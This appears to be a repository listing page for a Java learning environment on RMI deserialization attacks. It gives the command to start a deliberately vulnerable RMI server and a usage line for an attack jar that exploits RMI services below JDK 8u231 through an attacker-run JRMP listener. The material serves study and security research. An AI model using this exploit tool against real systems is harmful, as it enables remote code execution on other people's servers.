lalajun/RMIDeserialize lalajun/RMIDeserialize

  • Stars
    star
    211
  • Rank 185,784 (Top 4 %)
  • Language
    Java
  • Created over 4 years ago
  • Updated about 4 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
lalajun/RMIDeserialize
github

lalajun

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

RMI 反序列化环境 一步步

RMIDeserialize

RMI反序列化学习环境,细节请参考博客RMI-反序列化-深入-上RMI-反序列化-深入-下

java -cp RMIDeserialize.jar com.lala.ServerAndRegister :起一个包含CC链可以被攻击的RMI服务

java -jar RMI-Bypass290.jar <攻击目标IP> <攻击目标端口> <本地JRMP服务IP> <本地JRMP服务端口>:攻击目标8u231版本以下的RMI服务。

其他功能可以从源码运行。

总结图.png

More Repositories

1

Fastjson_Deserialize

Fastjson反序列化环境(一步步)
Java
14
star
2

jdk7u21

jdk7u21反序列化利用分析
Java
10
star